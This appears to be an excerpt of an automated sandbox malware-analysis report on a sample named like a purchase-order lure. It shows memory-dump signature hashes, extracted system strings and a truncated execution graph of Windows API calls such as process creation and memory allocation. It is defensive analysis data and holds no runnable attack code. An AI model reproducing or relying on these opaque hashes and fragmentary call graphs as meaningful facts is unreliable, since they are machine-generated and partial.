                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2b8de46129ca52ab3326f9ad7a6bb18ad96c2442d556208139e2f71c494d51cf
                                                                          • Instruction ID: 97d741dde7d23235f4d59cb64d84807c3fb574edfd3505350fb0cfffb6d1e8e2
                                                                          • Opcode Fuzzy Hash: 2b8de46129ca52ab3326f9ad7a6bb18ad96c2442d556208139e2f71c494d51cf
                                                                          • Instruction Fuzzy Hash: 2090022524150802D14071588418707405AD7D0601F55C111B006C554DC6168A6677B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 203c7a11cf0440079ae304d2c7f2fb9f580c4d3e17044a31071fb875726e7952
                                                                          • Instruction ID: e83f310495ef7747410cf3903afbd1379d75d674a0a0a8e493de5f44d43cee5d
                                                                          • Opcode Fuzzy Hash: 203c7a11cf0440079ae304d2c7f2fb9f580c4d3e17044a31071fb875726e7952
                                                                          • Instruction Fuzzy Hash: 5090022520194442D14072584808B0F815997E1202F95C119B419E554CC91589566721
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b515ff84b9a55bfd8c828b1d98b7fb1c0ce6fe8de6fe19938caf38eb71b0bd33
                                                                          • Instruction ID: 5f5e7378a7da98f2dce6a8d8e149d6e2eac80d54a0c6d25bac9796cadffd1b08
                                                                          • Opcode Fuzzy Hash: b515ff84b9a55bfd8c828b1d98b7fb1c0ce6fe8de6fe19938caf38eb71b0bd33
                                                                          • Instruction Fuzzy Hash: 6590022524555102D150715C44086168059B7E0201F55C121B085C594DC55589567321
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9af658a16d17fa6fdd71ab153b495f14f350203458cb721ea7b6dc96858c5568
                                                                          • Instruction ID: 6782c5ac50b35c82dd10976ce72ec5b155cc2e1f25017f5be6da90a836c971ca
                                                                          • Opcode Fuzzy Hash: 9af658a16d17fa6fdd71ab153b495f14f350203458cb721ea7b6dc96858c5568
                                                                          • Instruction Fuzzy Hash: B090023520250142954072585808A4E815997E1302B95D515B005D554CC91489626321
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 152eac4171e01862406bdfef1c1a8f36c3ba2315ead2f211688816790eabd1fe
                                                                          • Instruction ID: 420ab20d8331380d29e8089b6212e76e24651941747f9662ae546b39b73eb6d1
                                                                          • Opcode Fuzzy Hash: 152eac4171e01862406bdfef1c1a8f36c3ba2315ead2f211688816790eabd1fe
                                                                          • Instruction Fuzzy Hash: FF90023920150402D51071585808646409A97D0301F55D511B046C558DC65489A2B221
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 67df9bfada60c959171c07c113843abc5d02a93a4bddb86746b6dff718eae0e4
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 7cd50088c44cbfb1152c00b843597837b1e71ecec657cbb3732fe20f4c53b2ef
                                                                          • Instruction ID: b30d1275d4c3ccaac96126aeaec74ef8a3a05717d2fd353b26fca9167caabecc
                                                                          • Opcode Fuzzy Hash: 7cd50088c44cbfb1152c00b843597837b1e71ecec657cbb3732fe20f4c53b2ef
                                                                          • Instruction Fuzzy Hash: C651E7B6B04126BFCB21DF9C899097EFBB8BB482417548229F45DD7645D374DE00C7A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: cc14898f58e21c6717f3678d93ff4145f776efb31c4fb4f89104c27c1522ca23
                                                                          • Instruction ID: 6cae8cf312513f2a9a90d71f4921bde24789bf158ae713de1fd3af967b5c8681
                                                                          • Opcode Fuzzy Hash: cc14898f58e21c6717f3678d93ff4145f776efb31c4fb4f89104c27c1522ca23
                                                                          • Instruction Fuzzy Hash: FE5108B1A00645BFDF30DF9DC89097FB7FCEB88201B048869E59ED7682D674DA408761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01954725
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01954742
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01954655
                                                                          • ExecuteOptions, xrefs: 019546A0
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019546FC
                                                                          • Execute=1, xrefs: 01954713
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01954787
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: bc91968008b0de9b883d2c42e5ba8788d1b5aea7c12c300e9f5fa1dcdf889b7f
                                                                          • Instruction ID: 36f7a581eef3d555da08d3aed17fd774a9e285ad64df234cb395deed15c271be
                                                                          • Opcode Fuzzy Hash: bc91968008b0de9b883d2c42e5ba8788d1b5aea7c12c300e9f5fa1dcdf889b7f
                                                                          • Instruction Fuzzy Hash: F9516A3160021FAAEF15EBE8EC99FA977ACAF54300F040499E60DA7185EB719A81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: a3cd43133c96a8cd72886aae84def560b50e8689a0c47630a226cc5466917d3a
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: B181E330E0526A8EEF25CE6CC850BFEBBF9AF45321F184519D86FA7699C7748840CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$[$]:%u
                                                                          • API String ID: 48624451-2819853543
                                                                          • Opcode ID: a33153f1a3d6e2c567c1bfd30fd0997170227d31dab184247c1ed504b34cb99e
                                                                          • Instruction ID: b6aa18aba9ae554e65ea15be3d2a64b0942341a4f7279f69055a42cee2d54851
                                                                          • Opcode Fuzzy Hash: a33153f1a3d6e2c567c1bfd30fd0997170227d31dab184247c1ed504b34cb99e
                                                                          • Instruction Fuzzy Hash: 2E2133BAE00119ABDB21DF6DD840AEEBBECAF54655F550126E909D3204E730DA118BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 0195031E
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019502E7
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019502BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: 9a5ce702901f683cf5261a349beee7338802165e55012841a1c9c89e2506250f
                                                                          • Instruction ID: 8185d23229165d79b275d8a8d97548262c3261aa3c2c87879b841688f733bc90
                                                                          • Opcode Fuzzy Hash: 9a5ce702901f683cf5261a349beee7338802165e55012841a1c9c89e2506250f
                                                                          • Instruction Fuzzy Hash: BCE1BF316087429FD726CF28C884B2ABBE4BF84714F180A1DF9A9DB2D1D774DA45CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 01957BAC
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01957B7F
                                                                          • RTL: Resource at %p, xrefs: 01957B8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          • Opcode ID: f69442b6d8486e8a5863abd0969f9f32e5f900631f35377aff5585e846904eed
                                                                          • Instruction ID: 6e9bd2d0770b7da90a33b8ee0ef7d38e70c089c04325fcc07e2d76cd6735597f
                                                                          • Opcode Fuzzy Hash: f69442b6d8486e8a5863abd0969f9f32e5f900631f35377aff5585e846904eed
                                                                          • Instruction Fuzzy Hash: F541B0317007069FD724DE29D840B6AB7EAEF98711F100A1DFA5EEB780DB31E9458B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0195728C
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 019572C1
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01957294
                                                                          • RTL: Resource at %p, xrefs: 019572A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: ecbb29dc0244727e407c86b4f0bd235e627f85afd6e15280381c715616d0f699
                                                                          • Instruction ID: d3d61d63352bb6fc394e23eafae4c0702b707e1cf36f45200a1645986f9303a5
                                                                          • Opcode Fuzzy Hash: ecbb29dc0244727e407c86b4f0bd235e627f85afd6e15280381c715616d0f699
                                                                          • Instruction Fuzzy Hash: 3141F231740206ABD724CE69CC41F66B7AAFB94B51F104A19FD5EEB280DB31E942CBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: ac5edaa9807dca7a2c32663753ca29cd097279223cf0ad0dff174cb0b745ddd5
                                                                          • Instruction ID: 5d972db00a542e7a1ee567737ef7a7bfd5fe584423f2fe427a97adaa67deb340
                                                                          • Opcode Fuzzy Hash: ac5edaa9807dca7a2c32663753ca29cd097279223cf0ad0dff174cb0b745ddd5
                                                                          • Instruction Fuzzy Hash: 5B315476A00219AFDF20DF2DDC41BEEB7FCEB54611F444559E94DE3240EB309A448BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction ID: 1fbc6e157788701b45bc0ad1b6e47ba9689cf7dc6d4bf425f5d905207e09d4de
                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction Fuzzy Hash: AD91F670E042369BDB28DFADC881EFEBBA9AF54321F14451AE91DF72D8D73099408721
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280
                                                                          • Opcode ID: 79df3ad88d68f2dc150133b2cc48647481b20078ea12f4abbdaa08b42383ed5c
                                                                          • Instruction ID: 973701bfcdd9970609d04c366c3742971b8b02ba69901b555dab2247d6f5eb76
                                                                          • Opcode Fuzzy Hash: 79df3ad88d68f2dc150133b2cc48647481b20078ea12f4abbdaa08b42383ed5c
                                                                          • Instruction Fuzzy Hash: 81810971D002699BDB35DB54DC44BEABBB8BB49754F0041EAEA1DB7280D7709E84CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0196CFBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: CallFilterFunc@8
                                                                          • String ID: @$@4rw@4rw
                                                                          • API String ID: 4062629308-2979693914
                                                                          • Opcode ID: 214c09bbae73f9e4dae5490c10bd616e6522c3fa6ac8049ca14ccad6c5f41f44
                                                                          • Instruction ID: 659e712b3d4f9500a6d72d505a7d62b74c4db37070ef9b60ad3e6e03a5187334
                                                                          • Opcode Fuzzy Hash: 214c09bbae73f9e4dae5490c10bd616e6522c3fa6ac8049ca14ccad6c5f41f44
                                                                          • Instruction Fuzzy Hash: 3A41A0B1A00219DFCB21DF99C940AADBBF8FF95B40F00842EEA59DB254D774D941CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:2.9%
                                                                          Dynamic/Decrypted Code Coverage:2.3%
                                                                          Signature Coverage:3.2%
                                                                          Total number of Nodes:939
                                                                          Total number of Limit Nodes:116
2edece0 LdrLoadDll 98268->98270 98270->98268 98271 2ed0920 98272 2ed093a 98271->98272 98273 2ed4120 LdrLoadDll 98272->98273 98274 2ed0958 98273->98274 98275 2ee0b80 LdrLoadDll 98274->98275 98276 2ed096e 98275->98276 98277 2ed098c PostThreadMessageW 98276->98277 98278 2ed099d 98276->98278 98277->98278 98279 2ee4fe0 98280 2ee4ffd 98279->98280 98281 2ee6190 LdrLoadDll 98280->98281 98282 2ee500e 98281->98282 98285 5442af0 LdrInitializeThunk 98282->98285 98283 2ee5039 98285->98283 98286 5442ad0 LdrInitializeThunk 98287 2ed8b71 98295 2ed8b80 98287->98295 98288 2ed8b87 98289 2ee0b80 LdrLoadDll 98289->98295 98290 2ed8c6f GetFileAttributesW 98290->98295 98291 2ed8e1a 98292 2ed8e33 98291->98292 98293 2ee6fb0 2 API calls 98291->98293 98293->98292 98294 2ed4400 LdrLoadDll 98294->98295 98295->98288 98295->98289 98295->98290 98295->98291 98295->98294 98296 2edc840 2 API calls 98295->98296 98299 2ee1a60 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 98295->98299 98300 2ee1900 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 98295->98300 98296->98295 98299->98295 98300->98295 98301 2ed6870 98302 2ed688c 98301->98302 98305 2ed696f 98301->98305 98303 2ee5180 2 API calls 98302->98303 98302->98305 98304 2ed68a7 98303->98304 98315 2ed5eb0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98304->98315 98306 2ed6a08 98305->98306 98316 2ed5eb0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98305->98316 98309 2ed69e2 98309->98306 98317 2ed6080 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98309->98317 98311 2ed68df 98312 2ed4400 LdrLoadDll 98311->98312 98313 2ed690c 98312->98313 98314 2ed4400 LdrLoadDll 98313->98314 98314->98305 98315->98311 98316->98309 98317->98306 98318 2ed53b0 98320 2ed53e0 98318->98320 98323 2ed73a0 98318->98323 98322 2ed540c 98320->98322 98327 2ed7320 98320->98327 98324 2ed73b3 98323->98324 98335 2ee4810 98324->98335 98326 2ed73de 98326->98320 98345 2ee44e0 98327->98345 98329 2ed7364 98334 2ed7385 98329->98334 98352 2ee4670 98329->98352 
98331 2ed7375 98332 2ed7391 98331->98332 98333 2ee5180 2 API calls 98331->98333 98332->98320 98333->98334 98334->98320 98336 2ee4866 98335->98336 98337 2ee4834 98335->98337 98338 2ee6190 LdrLoadDll 98336->98338 98339 2ee6190 LdrLoadDll 98337->98339 98340 2ee487c 98338->98340 98341 2ee484e 98339->98341 98344 5442dd0 LdrInitializeThunk 98340->98344 98341->98326 98342 2ee488b 98342->98326 98344->98342 98346 2ee453b 98345->98346 98347 2ee4501 98345->98347 98349 2ee6190 LdrLoadDll 98346->98349 98348 2ee6190 LdrLoadDll 98347->98348 98350 2ee451b 98348->98350 98351 2ee4551 98349->98351 98350->98329 98351->98329 98353 2ee46c6 98352->98353 98354 2ee4694 98352->98354 98356 2ee6190 LdrLoadDll 98353->98356 98355 2ee6190 LdrLoadDll 98354->98355 98357 2ee46ae 98355->98357 98358 2ee46dc 98356->98358 98357->98331 98361 5444650 LdrInitializeThunk 98358->98361 98359 2ee46eb 98359->98331 98361->98359 98362 2ee06f0 98363 2ee070c 98362->98363 98374 2ee4e70 98363->98374 98366 2ee0748 98369 2ee5180 2 API calls 98366->98369 98367 2ee0734 98368 2ee5180 2 API calls 98367->98368 98370 2ee073d 98368->98370 98371 2ee0751 98369->98371 98378 2ee70d0 98371->98378 98373 2ee075c 98375 2ee4e8d 98374->98375 98376 2ee6190 LdrLoadDll 98375->98376 98377 2ee072d 98376->98377 98377->98366 98377->98367 98379 2ee5440 2 API calls 98378->98379 98380 2ee70ed 98379->98380 98380->98373 98381 2ee80f0 98382 2ee6fb0 2 API calls 98381->98382 98383 2ee8105 98382->98383 98384 2ee36b0 98385 2ee370a 98384->98385 98387 2ee3717 98385->98387 98388 2ed6ac0 98385->98388 98389 2ed6a65 98388->98389 98390 2ed6ae2 98388->98390 98391 2eda0f0 LdrLoadDll 98389->98391 98392 2ed6a9c 98391->98392 98393 2ed6ab2 98392->98393 98395 2eda380 98392->98395 98393->98387 98396 2eda3a6 98395->98396 98397 2ee0b80 LdrLoadDll 98396->98397 98399 2eda3fa 98397->98399 98398 2eda773 98398->98393 98399->98398 98442 2ee5520 98399->98442 98401 2eda44b 98402 2eda75b 98401->98402 98446 2ee81c0 98401->98446 98403 2ee6fb0 2 API calls 98402->98403 
98403->98398 98405 2eda46a 98405->98402 98406 2eda573 98405->98406 98452 2ee48e0 98405->98452 98462 2ed5440 LdrLoadDll LdrInitializeThunk LdrInitializeThunk 98406->98462 98410 2eda59e 98410->98402 98414 2ed5330 2 API calls 98410->98414 98419 2eda5d3 98410->98419 98411 2eda4f9 98411->98398 98417 2eda528 98411->98417 98423 2eda559 98411->98423 98458 2ed5330 98411->98458 98412 2ee6fb0 2 API calls 98416 2eda569 98412->98416 98414->98419 98415 2ee5180 2 API calls 98418 2eda538 98415->98418 98416->98393 98417->98415 98463 2ee26d0 LdrLoadDll LdrInitializeThunk 98418->98463 98421 2eda73a 98419->98421 98422 2eda603 98419->98422 98425 2ee6fb0 2 API calls 98421->98425 98464 2ee5220 98422->98464 98423->98412 98426 2eda751 98425->98426 98426->98393 98427 2eda622 98473 2ed71d0 98427->98473 98429 2eda68b 98429->98402 98430 2eda696 98429->98430 98431 2ee6fb0 2 API calls 98430->98431 98432 2eda6ba 98431->98432 98480 2ee4b40 98432->98480 98436 2eda6f5 98437 2eda6fc 98436->98437 98438 2ee4b40 2 API calls 98436->98438 98437->98393 98439 2eda722 98438->98439 98495 2ee46f0 98439->98495 98441 2eda730 98441->98393 98443 2ee553d 98442->98443 98444 2ee6190 LdrLoadDll 98443->98444 98445 2ee554e CreateProcessInternalW 98444->98445 98445->98401 98447 2ee8130 98446->98447 98448 2ee818d 98447->98448 98449 2ee7090 2 API calls 98447->98449 98448->98405 98450 2ee816a 98449->98450 98451 2ee6fb0 2 API calls 98450->98451 98451->98448 98453 2ee48fd 98452->98453 98454 2ee6190 LdrLoadDll 98453->98454 98455 2ee490e 98454->98455 98504 5442c0a 98455->98504 98456 2eda4f1 98456->98406 98456->98411 98459 2ed5333 98458->98459 98460 2ee4a80 2 API calls 98459->98460 98461 2ed536e 98460->98461 98461->98417 98462->98410 98463->98423 98465 2ee5282 98464->98465 98466 2ee5244 98464->98466 98467 2ee6190 LdrLoadDll 98465->98467 98468 2ee6190 LdrLoadDll 98466->98468 98469 2ee5298 98467->98469 98471 2ee525e 98468->98471 98507 5442e80 LdrInitializeThunk 98469->98507 98470 2ee52b3 98470->98427 98471->98427 98474 2ed71ed 
98473->98474 98508 2ee49d0 98474->98508 98476 2ed723d 98477 2ed7244 98476->98477 98478 2ee4a80 2 API calls 98476->98478 98477->98429 98479 2ed726d 98478->98479 98479->98429 98481 2ee4b5a 98480->98481 98482 2ee6190 LdrLoadDll 98481->98482 98483 2ee4b6b 98482->98483 98518 5442d30 LdrInitializeThunk 98483->98518 98484 2eda6ce 98486 2ee4a80 98484->98486 98487 2ee4af3 98486->98487 98488 2ee4aa1 98486->98488 98489 2ee6190 LdrLoadDll 98487->98489 98490 2ee6190 LdrLoadDll 98488->98490 98491 2ee4b09 98489->98491 98492 2ee4abb 98490->98492 98519 5442d10 LdrInitializeThunk 98491->98519 98492->98436 98493 2ee4b38 98493->98436 98496 2ee4746 98495->98496 98497 2ee4714 98495->98497 98498 2ee6190 LdrLoadDll 98496->98498 98499 2ee6190 LdrLoadDll 98497->98499 98500 2ee475c 98498->98500 98501 2ee472e 98499->98501 98520 5442fb0 LdrInitializeThunk 98500->98520 98501->98441 98502 2ee476b 98502->98441 98505 5442c1f LdrInitializeThunk 98504->98505 98506 5442c11 98504->98506 98505->98456 98506->98456 98507->98470 98509 2ee4a37 98508->98509 98510 2ee49f1 98508->98510 98512 2ee6190 LdrLoadDll 98509->98512 98511 2ee6190 LdrLoadDll 98510->98511 98514 2ee4a0b 98511->98514 98513 2ee4a4d 98512->98513 98517 5442f30 LdrInitializeThunk 98513->98517 98514->98476 98515 2ee4a70 98515->98476 98517->98515 98518->98484 98519->98493 98520->98502 98521 2ee3eb0 98522 2ee3f0a 98521->98522 98524 2ee3f17 98522->98524 98525 2ee2450 98522->98525 98526 2ee6f20 2 API calls 98525->98526 98528 2ee2491 98526->98528 98527 2ee2596 98527->98524 98528->98527 98529 2ed4120 LdrLoadDll 98528->98529 98530 2ee24d7 98529->98530 98531 2ee0b80 LdrLoadDll 98530->98531 98533 2ee24fc 98531->98533 98532 2ee2510 Sleep 98532->98533 98533->98527 98533->98532 98534 2ee4770 98535 2ee4791 98534->98535 98536 2ee47cf 98534->98536 98537 2ee6190 LdrLoadDll 98535->98537 98538 2ee6190 LdrLoadDll 98536->98538 98539 2ee47ab 98537->98539 98540 2ee47e5 98538->98540 98543 5442ee0 LdrInitializeThunk 98540->98543 98541 2ee4800 98543->98541 98544 
